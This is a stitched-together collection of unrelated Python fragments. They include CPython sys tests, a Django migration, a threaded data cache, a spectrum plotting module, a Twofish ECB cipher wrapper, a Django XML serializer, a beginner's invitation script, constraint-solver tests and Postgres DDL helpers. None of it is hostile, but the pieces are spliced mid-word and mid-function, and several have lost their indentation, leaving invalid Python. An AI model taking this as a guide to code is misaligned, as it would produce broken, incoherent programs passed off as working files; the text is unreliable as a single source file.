    def test_43581(self):
        """stdout and stderr should share one encoding (regression check;
        presumably named after the original tracker issue id)."""
        # Can't use sys.stdout, as this is a StringIO object when
        # the test runs under regrtest.
        self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
    def test_intern(self):
        """Interning returns the canonical object; str subclasses are refused."""
        global numruns
        # numruns makes the probe string unique per run of this test.
        numruns += 1
        self.assertRaises(TypeError, sys.intern)
        s = "never interned before" + str(numruns)
        self.assertTrue(sys.intern(s) is s)
        # A distinct-but-equal string must intern to the same object.
        s2 = s.swapcase().swapcase()
        self.assertTrue(sys.intern(s2) is s)
        # Subclasses of string can't be interned, because they
        # provide too much opportunity for insane things to happen.
        # We don't want them in the interned dict and if they aren't
        # actually interned, we don't want to create the appearance
        # that they are by allowing intern() to succeed.
        class S(str):
            def __hash__(self):
                return 123
        self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug", "division_warning",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
    def test_clear_type_cache(self):
        # Just verify the call succeeds; the cache state is not observable.
        sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = |
#!/usr/bin/python
# Load a JSON document from disk and echo it (Python 2 print statement).
import json
with open("test_json.json","r") as f:
    new_list = json.load(f)
print new_list
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from djang | o.db import migrations, models
import datetime
class Migration(migrations.Migration):
    """Auto-generated migration: refresh CustomCourseForEdX field defaults
    (delivery_mode choices and the `time` timestamp captured at generation)."""
    dependencies = [
        ('ccx', '0008_auto_20170523_0630'),
    ]
    operations = [
        migrations.AlterField(
            model_name='customcourseforedx',
            name='delivery_mode',
            field=models.CharField(default=b'IN_PERSON', max_length=255, choices=[(b'IN_PERSON', b'In Person'), (b'ONLINE_ONLY', b'Online')]),
        ),
        migrations.AlterField(
            model_name='customcourseforedx',
            name='time',
            # Default is the wall-clock time when this migration was generated.
            field=models.DateTimeField(default=datetime.datetime(2017, 6, 8, 5, 24, 53, 908103)),
        ),
    ]
|
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import threading
class TimeoutError(Exception):
    # Raised by Datasrc.wait() when no new datum arrives in time.
    # NOTE(review): shadows the Python 3 builtin TimeoutError; kept for API compat.
    pass
class Datasrc(object):
    """Thread-safe, bounded, insertion-ordered cache of keyed datums.

    Holds at most `length` items (None or <= 0 means unbounded); when full,
    the oldest item is ejected.  `history` orders keys oldest-to-youngest,
    `sortedkeys` mirrors the keys alphabetically for keys(sort='alpha').
    """

    def __init__(self, length=0):
        self.length = length      # capacity; None or <= 0 means unbounded
        self.cursor = -1          # kept for API compatibility (unused here)
        self.datums = {}          # key -> value
        self.history = []         # keys, oldest first
        self.sortedkeys = []      # keys, alphabetical
        self.cond = threading.Condition()
        self.newdata = threading.Event()

    def __getitem__(self, key):
        with self.cond:
            return self.datums[key]

    def __setitem__(self, key, value):
        self.push(key, value)

    def __contains__(self, key):
        with self.cond:
            return key in self.datums

    def has_key(self, key):
        # Legacy dict-style membership test, kept for old callers.
        with self.cond:
            return key in self.datums

    def __delitem__(self, key):
        self.remove(key)

    def __len__(self):
        with self.cond:
            return len(self.history)

    def _resort(self):
        # Rebuild the alphabetical index.  Caller must hold self.cond.
        self.sortedkeys = sorted(self.datums.keys())

    def push(self, key, value):
        """Insert or replace `key`, making it youngest; may eject the oldest."""
        with self.cond:
            if key in self.history:
                self.history.remove(key)
            self.history.append(key)
            self.datums[key] = value
            self._eject_old()
            # BUGFIX: keep the alphabetical index in sync on insert as well —
            # previously it was refreshed only on removal/ejection, so
            # keys(sort='alpha') missed freshly pushed keys.
            self._resort()
            self.newdata.set()
            self.cond.notify()

    def pop_one(self):
        """Remove and return the value of the oldest datum."""
        return self.remove(self.history[0])

    def pop(self, *args):
        """pop() -> oldest value; pop(key) -> value stored under key."""
        if len(args) == 0:
            return self.remove(self.history[0])
        if len(args) != 1:
            # The original used `assert` here; raise explicitly so the
            # check survives `python -O`.
            raise ValueError("Too many parameters to pop()")
        return self.remove(args[0])

    def remove(self, key):
        """Remove `key` and return its value; KeyError if absent."""
        with self.cond:
            val = self.datums[key]
            self.history.remove(key)
            del self.datums[key]
            self._resort()
            return val

    def _eject_old(self):
        # Drop oldest entries until within capacity.  Caller holds self.cond.
        if (self.length is None) or (self.length <= 0):
            # no limit
            return
        while len(self.history) > self.length:
            oldest = self.history.pop(0)
            del self.datums[oldest]
        self._resort()

    def index(self, key):
        """Return the age rank of `key` (0 == oldest)."""
        with self.cond:
            return self.history.index(key)

    def index2key(self, index):
        with self.cond:
            return self.history[index]

    def index2value(self, index):
        with self.cond:
            return self.datums[self.history[index]]

    def youngest(self):
        """Return the most recently pushed value."""
        with self.cond:
            return self.datums[self.history[-1]]

    def oldest(self):
        """Return the least recently pushed value."""
        with self.cond:
            return self.datums[self.history[0]]

    def pop_oldest(self):
        return self.pop(self.history[0])

    def pop_youngest(self):
        return self.pop(self.history[-1])

    def keys(self, sort='alpha'):
        """Return the keys sorted alphabetically, by age, or unordered."""
        with self.cond:
            if sort == 'alpha':
                return self.sortedkeys
            elif sort == 'time':
                return self.history
            else:
                return self.datums.keys()

    def wait(self, timeout=None):
        """Block until a new datum is pushed; return its key.

        Raises:
            TimeoutError: if woken without new data within `timeout` seconds.
        """
        with self.cond:
            self.cond.wait(timeout=timeout)
            if not self.newdata.is_set():
                raise TimeoutError("Timed out waiting for datum")
            self.newdata.clear()
            return self.history[-1]

    def get_bufsize(self):
        with self.cond:
            return self.length

    def set_bufsize(self, length):
        """Change the capacity, ejecting oldest entries if now over it."""
        with self.cond:
            self.length = length
            self._eject_old()
#END
|
""" ./examples/attachment/attachment_step.rst """
from hamcrest import assert_that
from allure_commons_test.report import has_test_case
from allure_commons_test.result import has_step
from allure_ | comm | ons_test.result import has_attachment
def test_step_with_attachment(executed_docstring_path):
    """The report must record a step that carries an attachment."""
    expected = has_test_case(
        "test_step_with_attachment",
        has_step("step_with_attachment", has_attachment()),
    )
    assert_that(executed_docstring_path.allure_report, expected)
|
self.scale*nanmask+self.continuum-self.baseline.basespec
self.spectrumplot = axis.plot(self.vind,self.spectrum+self.offset,color=self.plotcolor,
linestyle='steps-mid',linewidth=linewidth,
**kwargs)
else:
self.spectrum = self.cube*self.scale+self.continuum-self.baseline.basespec
self.spectrumplot = axis.plot(self.vind,self.spectrum+self.offset,color=self.plotcolor,
linestyle='steps-mid',linewidth=linewidth,
**kwargs)
if self.errspec is not None:
if errstyle == 'fill':
self.errorplot = [axis.fill_between(steppify(self.vind,isX=True,sign=sign(self.dv)),
steppify(self.spectrum+self.offset-self.errspec*self.scale),
steppify(self.spectrum+self.offset+self.errspec*self.scale),
facecolor=self.plotcolor, alpha=self.erralpha, **kwargs)]
elif errstyle == 'bars':
self.errorplot = axis.errorbar(self.vind, self.spectrum+self.offset,
yerr=self.errspec*self.scale, ecolor=self.plotcolor, fmt=None,
**kwargs)
if vmin is not None: xlo = self.vmin
else: xlo=self.vind.min()
if vmax is not None: xhi = self.vmax
else: xhi=self.vind.max()
axis.set_xlim(xlo,xhi)
if self.title is not None:
axis.set_title(self.title)
elif self.xtora and self.ytodec:
axis.set_title("Spectrum at %s %s" %
(ratos(self.xtora(i)),dectos(self.ytodec(j))))
elif self.specname:
axis.set_title("Spectrum of %s" % self.specname)
if isinstance(self.xunits,str):
axis.set_xlabel(self.xunits)
else:
axis.set_xlabel("V$_{LSR}$ (km s$^{-1}$)")
self.xunits = 'km/s'
if units in ['Ta*','Tastar','K']:
axis.set_ylabel("$T_A^*$ (K)")
elif units == 'mJy':
axis.set_ylabel("$S_\\nu$ (mJy)")
elif units == 'Jy':
axis.set_ylabel("$S_\\nu$ (Jy)")
else:
axis.set_ylabel(self.units)
if self.autorefresh: self.refresh()
    def save(self,fname,**kwargs):
        """
        Save the current spectrum (useful for saving baselined data)

        fname    - output FITS file name
        **kwargs - passed through to pyfits writeto()
        """
        # Wrap the data cube and its header into a new primary HDU.
        newfile = pyfits.PrimaryHDU(data=self.cube,header=self.header)
        newfile.writeto(fname,**kwargs)
def savefig(self,fname,bbox_inches='tight',**kwargs):
"""
simple wrapper of maplotlib's savefig.
"""
self.axis.figure.savefig(fname,bbox_inches=bbox_inches,**kwargs)
    def showlines(self,linefreqs,linenames,ctype='freq',cunit='hz',yscale=0.8,vofflines=0.0,
            voffunit='km/s',**kwargs):
        """
        Overplot vertical lines and labels at the frequencies (or velocities) of each line

        yscale    - fraction of maximum at which to label
        vofflines - velocity offset applied to the line positions
        """
        self.clearlines()
        if ctype != 'freq':
            print "Sorry, non-frequency units not implemented yet."
            return
        # km/s
        speedoflight=2.99792458e5
        if self.reffreq and self.xunits in ('km/s','m/s'):
            # Convert rest frequencies to velocities relative to reffreq.
            linefreqs = -(array(linefreqs)-self.reffreq)/self.reffreq * speedoflight
        if 'hz' in cunit or 'Hz' in cunit:
            # Frequency-space offset: apply as a Doppler scale factor.
            linefreqs *= (1.0 + vofflines / speedoflight)
        else:
            linefreqs += vofflines
        # x==x filters out NaNs (NaN != NaN), so ymax ignores blanked channels.
        ymax = (self.spectrum[self.spectrum==self.spectrum]).max()
        for lf,ln in zip(linefreqs,linenames):
            # Only draw lines that fall inside the plotted velocity range.
            if lf < self.vind.max() and lf > self.vind.min():
                self.linecollections.append(vlines(lf,0,ymax,**kwargs))
                self.texts.append(text(lf,ymax*yscale,ln,rotation='vertical',**kwargs))
        if self.autorefresh: self.refresh()
def clearlines(self):
if len(self.texts) > 0:
for T in self.texts:
if T in self.axis.texts:
self.axis.texts.remove(T)
if len(self.linecollections) > 0:
for LC in self.linecollections:
if LC in self.axis.collections:
self.axis.collections.remove(LC)
def refresh(self):
self.axis.figure.canvas.draw()
class FFT:
    """
    Plot the FFT (or a PSD estimate) of the spectrum held by a
    SpecPlotter instance.
    """
    def __init__(self,specplotter,fignum=3,axis=None, color='k'):
        """
        Attach to *specplotter*.  Draw into *axis* when given; otherwise
        use (creating if necessary) figure number *fignum*.
        """
        self.specplotter=specplotter
        if axis is None:
            self.fignum=fignum
            self.figure=figure(self.fignum)
            self.axis=gca()
        else:
            self.axis=axis
            self.figure=self.axis.figure
            self.fignum=None
        self.color=color
        self.fftplot=None
        self.setspec()
        self.setshift()
        self.clear()
    def __call__(self,psd=False,shift=True):
        """Re-read the spectrum, then plot its FFT (or PSD when psd=True)."""
        self.setspec()
        if psd:
            self.psd(shift=shift)
        else:
            self.fft(shift=shift)
    def fft(self,shift=True,logplot=False,**kwargs):
        """
        Plot the real part of the spectrum's FFT.

        shift   - apply fftshift so the zero frequency is centered
        logplot - use a logarithmic y axis
        """
        self.clear()
        self.setshift(shift)
        if logplot: self.axis.set_yscale('log')
        else: self.axis.set_yscale('linear')
        self.fftspec = fft(self.spectofft)
        self.realfft = self.fftspec.real
        self.imagfft = self.fftspec.imag
        self.fftplot = self.axis.plot(self.shiftfunc(self.realfft),
                drawstyle='steps-mid',color=self.color,**kwargs)
        self.refresh()
    def psd(self,logplot=True,shift=True,**kwargs):
        """
        Plot |F(x) * F(x reversed)| as a power-spectrum estimate.
        """
        self.clear()
        if logplot: self.axis.set_yscale('log')
        else: self.axis.set_yscale('linear')
        self.setshift(shift)
        self.psdspec = fft(self.spectofft) * fft(self.spectofft[::-1])
        self.psdreal = abs(self.psdspec)
        self.fftplot = self.axis.plot(self.shiftfunc(self.psdreal),
                drawstyle='steps-mid',color=self.color,**kwargs)
        # Re-assert the y scale after plotting, matching the original flow.
        if logplot: self.axis.set_yscale('log')
        else: self.axis.set_yscale('linear')
        self.refresh()
    def setshift(self,shift=True):
        """Choose whether plotted transforms are fftshift'ed."""
        if shift: self.shiftfunc = fftshift
        else: self.shiftfunc = lambda x: x
    def setspec(self):
        """Snapshot the plotter's spectrum with NaNs replaced by zero."""
        self.spectofft = copy(self.specplotter.spectrum)
        OKmask = (self.spectofft==self.spectofft)
        # BUG FIX: was "self.spectofft[(True-OKmask)] = 0".  Subtracting a
        # boolean array from True relied on boolean "-", which numpy has
        # removed; invert the mask to select the NaN positions instead.
        self.spectofft[~OKmask] = 0
    def clear(self):
        """Hide and drop any previous FFT plot, then wipe the axes."""
        if self.fftplot is not None:
            for p in self.fftplot:
                p.set_visible(False)
                if p in self.axis.lines: self.axis.lines.remove(p)
        self.axis.clear()
        self.refresh()
    def refresh(self):
        """Force a canvas redraw."""
        self.axis.figure.canvas.draw()
class PSD(FFT):
    """FFT subclass whose call operator always draws the PSD."""
    def __call__(self,shift=True):
        """Recompute the spectrum and redraw the PSD."""
        self.setshift(shift)
        self.setspec()
        self.clear()
        self.psd()
        self.refresh()
class Baseline:
def __init__(self,specplott | er):
self.baselinepars = None
self.order = None
self.basespec = zeros(specplotter.spectrum.shape[0])
self.excludemask = zeros(specp | lotter.spectrum.shape[0],dtype='bool')
self.OKmask = ones(specplotter.spectrum.shape[0],dtype='bool')
self.specplotter = specplotter
self.blleg = None
self.click = 0
self.nclicks_b1 = 0
self.nclicks_b2 = 0
self.fitregion=[]
self.excludevelo = []
self.excludepix = []
def __call__(self, order=1, annotate=False, excludefit=False, save=True,
exclude=None, exclusionlevel=0.01,
interactive=False, **kwargs):
"""
Fit and remove a polynomial from the spectrum.
It will be saved in the variable "self.basespec"
and the fit parameters will be saved in "self.order"
function baseline(spectrum,xarr=None,xmin=None,xmax=None,order=1,quiet=True,exclude=None):
Subtract a baseline from a spectrum
If xmin,xmax are not specified, defaults to ignoring first and last 10% of spectrum
exclude is a set of start/end indices to ignore when baseline fitting
(ignored by setting error to infinite in fitting procedure)
excludefit creates a mask based on the fitted gaussian model (assuming
that it has a zero-height) using an exclusion level of (exclusi |
#
# Loxodo -- Password Safe V3 compatible Password Vault
# Copyright (C) 2008 Christoph Sommer <mail@christoph-sommer.de>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should h | ave received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import twofish
class TwofishECB:
    """
    Electronic codebook (ECB) Twofish operation mode.
    """
    def __init__(self, key):
        """
        Set the key to be used for en-/de-cryption.
        """
        self.twofish = twofish.Twofish()
        self.twofish.set_key(key)
    def encrypt(self, plaintext):
        """
        Encrypt the given string using Twofish ECB.

        The input length must be a multiple of the 16-byte block size.
        """
        if len(plaintext) % 16:
            raise RuntimeError("Twofish plaintext length must be a multiple of 16")
        # Encrypt block-by-block and join once: the previous loop built the
        # result with repeated string "+=", which is quadratic in input size.
        blocks = [self.twofish.encrypt(plaintext[i:i + 16])
                  for i in range(0, len(plaintext), 16)]
        return "".join(blocks)
    def decrypt(self, ciphertext):
        """
        Decrypt the given string using Twofish ECB.

        The input length must be a multiple of the 16-byte block size.
        """
        if len(ciphertext) % 16:
            raise RuntimeError("Twofish ciphertext length must be a multiple of 16")
        blocks = [self.twofish.decrypt(ciphertext[i:i + 16])
                  for i in range(0, len(ciphertext), 16)]
        return "".join(blocks)
def test_twofish_ecb():
    """Round-trip self-test for TwofishECB against fixed test vectors."""
    __testkey = "Now Testing Crypto-Functions...."
    __testenc = "Passing nonsense through crypt-API, will then do assertion check"
    __testdec = "\x71\xbf\x8a\xc5\x8f\x6c\x2d\xce\x9d\xdb\x85\x82\x5b\x25\xe3\x8d\xd8\x59\x86\x34\x28\x7b\x58\x06\xca\x42\x3d\xab\xb7\xee\x56\x6f\xd3\x90\xd6\x96\xd5\x94\x8c\x70\x38\x05\xf8\xdf\x92\xa4\x06\x2f\x32\x7f\xbd\xd7\x05\x41\x32\xaa\x60\xfd\x18\xf4\x42\x15\x15\x56"
    cipher = TwofishECB(__testkey)
    assert cipher.decrypt(__testenc) == __testdec
    assert cipher.encrypt(__testdec) == __testenc
test_twofish_ecb()
"""
Called after handling all fields for an object.
"""
self.indent(1)
self.xml.endElement("object")
def handle_field(self, obj, field):
"""
Called to handle each field on an object (except for ForeignKeys and
ManyToManyFields)
"""
self.indent(2)
self.xml.startElement("field", {
"name" : field.name,
"type" : field.get_internal_type()
})
# Get a "string version" of the object's data.
if getattr(obj, field.name) is not None:
self.xml.characters(field.value_to_string(obj))
else:
self.xml.addQuickElement("None")
self.xml.endElement("field")
def handle_fk_field(self, obj, field):
"""
Called to handle a ForeignKey (we need to treat them slightly
differently from regular fields).
"""
self._start_relational_field(field)
related = getattr(obj, field.name)
if related is not None:
if self.use_natural_keys and hasattr(related, 'natural_key'):
# If related object has a natural key, use it
related = related.natural_key()
# Iterable natural keys are rolled out as subelements
for key_value in related:
self.xml.startElemen | t("natural", {})
self.xml.characters(smart_unicode(key_value))
self.xml.end | Element("natural")
else:
if field.rel.field_name == related._meta.pk.name:
# Related to remote object via primary key
related = related._get_pk_val()
else:
# Related to remote object via other field
related = getattr(related, field.rel.field_name)
self.xml.characters(smart_unicode(related))
else:
self.xml.addQuickElement("None")
self.xml.endElement("field")
def handle_m2m_field(self, obj, field):
"""
Called to handle a ManyToManyField. Related objects are only
serialized as references to the object's PK (i.e. the related *data*
is not dumped, just the relation).
"""
if field.rel.through._meta.auto_created:
self._start_relational_field(field)
if self.use_natural_keys and hasattr(field.rel.to, 'natural_key'):
# If the objects in the m2m have a natural key, use it
def handle_m2m(value):
natural = value.natural_key()
# Iterable natural keys are rolled out as subelements
self.xml.startElement("object", {})
for key_value in natural:
self.xml.startElement("natural", {})
self.xml.characters(smart_unicode(key_value))
self.xml.endElement("natural")
self.xml.endElement("object")
else:
def handle_m2m(value):
self.xml.addQuickElement("object", attrs={
'pk' : smart_unicode(value._get_pk_val())
})
for relobj in getattr(obj, field.name).iterator():
handle_m2m(relobj)
self.xml.endElement("field")
def _start_relational_field(self, field):
"""
Helper to output the <field> element for relational fields
"""
self.indent(2)
self.xml.startElement("field", {
"name" : field.name,
"rel" : field.rel.__class__.__name__,
"to" : smart_unicode(field.rel.to._meta),
})
class Deserializer(base.Deserializer):
"""
Deserialize XML.
"""
    def __init__(self, stream_or_string, **options):
        """
        Wrap *stream_or_string* in a pull-DOM event stream.

        The ``using`` option selects the database alias used for
        natural-key lookups; it defaults to DEFAULT_DB_ALIAS.
        """
        super(Deserializer, self).__init__(stream_or_string, **options)
        self.event_stream = pulldom.parse(self.stream)
        self.db = options.pop('using', DEFAULT_DB_ALIAS)
def next(self):
for event, node in self.event_stream:
if event == "START_ELEMENT" and node.nodeName == "object":
self.event_stream.expandNode(node)
return self._handle_object(node)
raise StopIteration
    def _handle_object(self, node):
        """
        Convert an <object> node to a DeserializedObject.

        Raises base.DeserializationError when the node lacks a ``pk``
        attribute or any <field> child lacks a ``name`` attribute.
        """
        # Look up the model using the model loading mechanism. If this fails,
        # bail.
        Model = self._get_model_from_node(node, "model")
        # Start building a data dictionary from the object. If the node is
        # missing the pk attribute, bail.
        pk = node.getAttribute("pk")
        if not pk:
            raise base.DeserializationError("<object> node is missing the 'pk' attribute")
        data = {Model._meta.pk.attname : Model._meta.pk.to_python(pk)}
        # Also start building a dict of m2m data (this is saved as
        # {m2m_accessor_attribute : [list_of_related_objects]})
        m2m_data = {}
        # Deserialize each field.
        for field_node in node.getElementsByTagName("field"):
            # If the field is missing the name attribute, bail (are you
            # sensing a pattern here?)
            field_name = field_node.getAttribute("name")
            if not field_name:
                raise base.DeserializationError("<field> node is missing the 'name' attribute")
            # Get the field from the Model. This will raise a
            # FieldDoesNotExist if, well, the field doesn't exist, which will
            # be propagated correctly.
            field = Model._meta.get_field(field_name)
            # As is usually the case, relation fields get the special treatment.
            if field.rel and isinstance(field.rel, models.ManyToManyRel):
                m2m_data[field.name] = self._handle_m2m_field_node(field_node, field)
            elif field.rel and isinstance(field.rel, models.ManyToOneRel):
                data[field.attname] = self._handle_fk_field_node(field_node, field)
            else:
                # A <None/> child marks a NULL value (vs. an empty string).
                if field_node.getElementsByTagName('None'):
                    value = None
                else:
                    value = field.to_python(getInnerText(field_node).strip())
                data[field.name] = value
        # Return a DeserializedObject so that the m2m data has a place to live.
        return base.DeserializedObject(Model(**data), m2m_data)
def _handle_fk_field_node(self, node, field):
"""
Handle a <field> node for a ForeignKey
"""
# Check if there is a child node named 'None', returning None if so.
if node.getElementsByTagName('None'):
return None
else:
if hasattr(field.rel.to._default_manager, 'get_by_natural_key'):
keys = node.getElementsByTagName('natural')
if keys:
# If there are 'natural' subelements, it must be a natural key
field_value = [getInnerText(k).strip() for k in keys]
obj = field.rel.to._default_manager.db_manager(self.db).get_by_natural_key(*field_value)
obj_pk = getattr(obj, field.rel.field_name)
# If this is a natural foreign key to an object that
# has a FK/O2O as the foreign key, use the FK value
if field.rel.to._meta.pk.rel:
obj_pk = obj_pk.pk
else:
# Otherwise, treat like a normal PK
field_value = getInnerText(node).strip()
obj_pk = field.rel.to._meta.get_field(field.rel.field_name).to_python(field_value)
return obj_pk
else:
field_value = getInnerText(node).strip()
return field.rel.to._meta.get_field(field.rel.field_name).to_python(field_value)
def _handle_m2m_field_node(self, node, field):
"""
Handle a <field> node for a ManyToManyField.
"""
if hasattr(field.rel.to._default_manager, 'get_by_natural_key'):
def m2m_convert(n):
|
# Royal dinner invitations: print one invitation per guest, swap out a
# guest who declined, then re-print the updated set.
invites = ['Queen Elizabeth II', 'Prince Philip', 'Duchess Kate', 'Prince William']
hello = "Your majesty "
message = ", you are invited to the Royal Dinner Party. \n- King George"

# Keep named copies so the unchanged invitations can be re-printed later.
rsvp_qe, rsvp_pp, rsvp_dk, rsvp_pw = [hello + guest + message for guest in invites]
for rsvp in (rsvp_qe, rsvp_pp, rsvp_dk, rsvp_pw):
    print(rsvp)

# Prince Philip cannot make it, so Princess Margaret takes his place.
print('\n' + invites[1] + ' cannot make it to the dinner')
invites[1] = 'Princess Margaret'
rsvp_pm = hello + invites[1] + message

for rsvp in ('\n' + rsvp_qe, rsvp_pm, rsvp_dk, rsvp_pw):
    print(rsvp)
print("\nThere are {} people invited to dinner.".format(len(invites)))
|
model.add_variable((obj1, obj2, obj3, vol_sum, capacity))
model.add_constraint(Leq((vol_sum, capacity)))
solver = Solver(model)
'''
obj1.print_domain()
obj2.print_domain()
obj3.print_domain()
vol_sum.print_domain()
capacity.print_domain()
'''
assert( solver.solve() )
'''
obj1.print_domain()
obj2.print_domain()
obj3.print_domain()
vol_sum.print_domain()
capacity.print_domain()
'''
#def testBinSearch(self):
# var1 = Variable(range(0,3))
#assert( var1.find([1,3,4], 2)[0] == 0)
def testSumProp(self):
var1, var2, var3, var4 = (Variable(list(range(1,5))) for x in range(0,4))
var3 = Variable([1,10])
var4 = Variable([2,10])
sum1 = Sum((var1, var2))
sum2 = Sum(((var3, var4), (1,2)))
model = NativeModel()
model.add_variable((var1, var2, var3, var4, sum1, sum2))
model.add_constraint(Equal((sum1, sum2)))
solver = Solver(model)
assert(solver.solve())
#print [x.get_value() for x in (var1, var2, var3, var4)]
assert(var1.get_value() + var2.get_value() == var3.get_value() + var4.get_value()*2)
def testVarExtractionNeq(self):
var1, var2 = (Variable(list(range(0,3))) for x in range(0,2))
model = NativeModel()
model.add_constraint(NotEqual((var1, var2)))
solver = Solver(model)
assert(solver.solve())
#print [v.get_value() for v in (var1, var2)]
def testVarExtractionWSum(self):
var1 = Variable(list(range(2,3)))
var2 = Variable(list(range(2,3)))
var3 = Variable(list(range(3,10)))
model = NativeModel()
model.add_constraint(Equal((Sum(((var1, var2), (2,1))), var3)))
solver = Solver(model)
#svar.print_domain()
assert( solver.solve() )
'''
Operator overloading tests
'''
def testOperatorOVerloading(self):
var1 = Variable(list(range(0,4)))
var2 = Variable(list(range(0,4)))
model = NativeModel()
model.add_constraint(var1 != var2)
solver = Solver(model)
assert(solver.solve())
def testEqualOver(self):
var1 = Variable([0])
var2 = Variable(list(range(0,1)))
model = NativeModel()
model.add_constraint(var1 == var2)
solver = Solver(model)
assert(solver.solve())
def testStupid_not_eqOver(self):
var1 = Variable(list(range(0,3)))
var2 = Variable(list(range(0,3)))
model = NativeModel()
model.add_constraint(var1 != var2)
solver = Solver(model)
assert(solver.solve())
assert(var1.get_value() != var2.get_value())
def testGEQOver(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_constraint(var1 >= var2)
model.add_constraint(var2 >= var3)
model.add_constraint(var1 >= var3)
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testLEQOver(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
|
model.add_constraint(var1 <= var2)
model.add_constraint(var2 <= var3)
model.add_constraint(var1 <= var3)
mo | del.add_constraint(var1 == var2)
model.add_constraint(var2 != var3)
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testLTOver(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_constraint(var1 < var2)
model.add_constraint(var2 < var3)
model.add_constraint(var1 < var3)
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testGTOver(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_constraint(var1 < var2)
model.add_constraint(var2 < var3)
model.add_constraint(var1 < var3)
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testPlusOver(self):
var1, var2 = (Variable(list(range(0,4))), Variable(list(range(0,4))))
model = NativeModel()
model.add_constraint(var1 == var2 + 3)
solver = Solver(model)
assert(solver.solve())
#print "%d %d " % (var1.get_value(), var2.get_value())
def testMinusOver(self):
var1, var2 = (Variable(list(range(0,4))), Variable(list(range(0,4))))
model = NativeModel()
model.add_constraint(var1 == var2 - 3)
solver = Solver(model)
assert(solver.solve())
def testTimesOver(self):
var1, var2 = (Variable(list(range(1,4))), Variable(list(range(0,4))))
model = NativeModel()
model.add_constraint(var1 == var2 * 2)
solver = Solver(model)
assert(solver.solve())
def testMinusOverNativeModelOp(self):
var1, var2 = (Variable(list(range(0,4))), Variable(list(range(0,4))))
model = NativeModel()
model << (var1 == var2 - 3)
solver = Solver(model)
assert(solver.solve())
def testTimesOverNativeModelOp(self):
var1, var2 = (Variable(list(range(1,4))), Variable(list(range(0,4))))
model = NativeModel()
model << (var1 == var2 * 2)
solver = Solver(model)
assert(solver.solve())
def testMaximization(self):
model = NativeModel()
var1, var2 = (Variable(0,4) for x in range(0,2))
var3 = Variable(0,10)
model << (var1 + var2 == var3)
solver = Solver(model)
assert( solver.maximise(var3) )
#print [v.get_value() for v in (var1, var2, var3)]
def testNegDomains(self):
var1 = Variable(-3, -1)
var2 = Variable(-2, 0)
model = NativeModel()
model << (var1*2 <= var2)
solver = Solver(model)
assert(solver.solve())
'''
Tests of stuff implemented from minizinc stuff
'''
def testAtLeastSAT(self):
model = NativeModel()
var1, var2 = (Variable(0,5), Variable(0,5))
model << (AtLeast(([var1, var2], 2, 2)))
solver = Solver(model)
assert(solver.solve())
assert(var1.get_value() is 2)
assert(var2.get_value() is 2)
def testAtLeastUNSAT_1(self):
model = NativeModel()
var1, var2 = (Variable(0,5), Variable(0,5))
model << (AtLeast(([var1, var2], 6, 2)))
solver = Solver(model)
assert(not solver.solve())
def testAtLeastUNSAT_2(self):
model = NativeModel()
var1, var2 = (Variable(0,5), Variable(0,5))
model << (AtLeast(([var1, var2], 0, 3)))
solver = Solver(model)
assert(not solver.solve())
def testAtMost(self):
model = NativeModel()
var1, var2 = (Variable(2,2), Variable(0,5))
model << (AtMost(([var1, var |
from collections import namedtuple
from foil.formatters import format_repr
from postpy.ddl import (
compile_column, compile_qualified_name, compile_primary_key,
compile_creat | e_table, compile_create_temporary_table
)
# Public API of this module: statement formatters for core Postgres objects.
__all__ = ('Database', 'Schema', 'Table', 'Column', 'PrimaryKey', 'View')
class Database:
    """Formats CREATE/DROP statements for a Postgres database."""

    __slots__ = 'name',

    def __init__(self, name):
        self.name = name

    def create_statement(self):
        """DDL statement creating this database."""
        return 'CREATE DATABASE {};'.format(self.name)

    def drop_statement(self):
        """DDL statement dropping this database if it exists."""
        return 'DROP DATABASE IF EXISTS {};'.format(self.name)

    def __repr__(self):
        return format_repr(self, self.__slots__)
class Schema:
    """Formats CREATE/DROP statements for a Postgres schema."""

    __slots__ = 'name',

    def __init__(self, name):
        self.name = name

    def create_statement(self):
        """Idempotent DDL statement creating this schema."""
        return 'CREATE SCHEMA IF NOT EXISTS {};'.format(self.name)

    def drop_statement(self):
        """DDL statement dropping this schema and everything in it."""
        return 'DROP SCHEMA IF EXISTS {} CASCADE;'.format(self.name)

    def __repr__(self):
        return format_repr(self, self.__slots__)
class Table(namedtuple('Table', 'name columns primary_key schema')):
